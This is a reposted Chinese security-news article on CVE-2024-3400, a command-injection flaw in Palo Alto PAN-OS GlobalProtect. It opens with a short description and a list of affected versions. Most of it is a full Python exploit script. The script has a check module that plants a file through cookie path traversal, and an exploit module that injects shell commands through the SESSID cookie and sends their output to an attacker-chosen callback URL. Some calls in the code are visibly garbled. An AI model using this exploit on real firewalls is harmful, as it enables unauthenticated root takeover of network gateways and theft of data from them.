Palo Alto Networks PAN-OS GlobalProtect 命令注入漏洞

admin 2024年5月31日00:28:23评论10 views字数 4936阅读16分27秒阅读模式


Palo Alto Networks PAN-OS GlobalProtect 命令注入漏洞

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Palo Alto Networks PAN-OS是一套专为其下一代防火墙 (NGFW) 产品开发的操作系统,提供了全面的网络安全功能,包括威胁防护,网络分段,远程访问等;GlobalProtect是Palo Alto Networks一套远程访问 VPN 解决方案,集成于PAN-OS系统中。GlobalProtect 命令注入漏洞情报。未经身份验证的攻击者可以利用该漏洞以ROOT权限执行任意命令。


version < 11.0.4-h1version < 10.2.9-h1version < 10.2.8-h3version < 10.2.7-h8version < 10.2.6-h3version < 11.1.0-h3version < 11.1.2-h3version < 11.0.2-h4version < 11.0.3-h10



Palo Alto Networks PAN-OS GlobalProtect 命令注入漏洞


# Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation# Date: 21 Apr 2024# Exploit Author: Kr0ff# Vendor Homepage: Software Link: -# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 #          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1# Tested on: Debian# CVE : CVE-2024-3400

#!/usr/bin/env python3

import sys

try:    import argparse    import requestsexcept ImportError:    print("Missing dependencies, either requests or argparse not installed")    sys.exit(2)

# #

def check_vuln(target: str, file: str) -> bool:    ret = False        uri = "/ssl-vpn/hipreport.esp"        s = requests.Session()    r = ""        headers = {                "User-Agent" :                         "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36", # Windows 10 Chrome                "Content-Type": "application/x-www-form-urlencoded",                "Cookie":                         f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"    }         headers_noCookie = {                "User-Agent" :                         "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36" # Windows 10 Chrome    }        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for "HTTP" !{e}")

        print("Trying with "HTTPS"...")

        target = "https://" + target        try:            r = (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for "HTTPS"")            sys.exit(1)    else:        r = (target + uri), verify=False, headers=headers, timeout=10 )

    if r.status_code == 200:        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )        if r.status_code == 403:            print("Target vulnerable to CVE-2024-3400")            ret = True    else:        return ret

    return ret        

def cmdexec(target: str, callback_url: str, payload: str) -> bool:    ret = False    p = ""

    if " " in payload:        p = payload.replace(" ", "${IFS)")

    uri = "/ssl-vpn/hipreport.esp"

    headers = {                "User-Agent" :                         "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36", # Windows 10 Chrome                "Content-Type": "application/x-www-form-urlencoded",                "Cookie":                         f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"


    s = requests.Session()    r = ""        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for "HTTP" !{e}")

        print("Trying with "HTTPS"...")

        target = "https://" + target        try:            r = (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for "HTTPS"")            sys.exit(1)    else:        r = (target + uri), verify=False, headers=headers, timeout=10 )

    if not "Success" in r.text:        return ret

    else:        ret = True

    return ret

#Initilize parser for argumentsdef argparser(selection=None):    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )        subparser = parser.add_subparsers( help="Available modules", dest="module")        exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )    #---------------------------------------    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g "exploitCheck.exp"", required=True )

    args = parser.parse_args(selection)    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])        if args.module == "exploit":            cmdexec(, args.callbackurl, args.payload)

    if args.module == "check":        check_vuln(, args.filename)

if __name__ == "__main__":    argparser()    print("Finished !")

原文始发于微信公众号(道玄网安驿站):Palo Alto Networks PAN-OS GlobalProtect 命令注入漏洞

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  • 本文由 发表于 2024年5月31日00:28:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Palo Alto Networks PAN-OS GlobalProtect 命令注入漏洞


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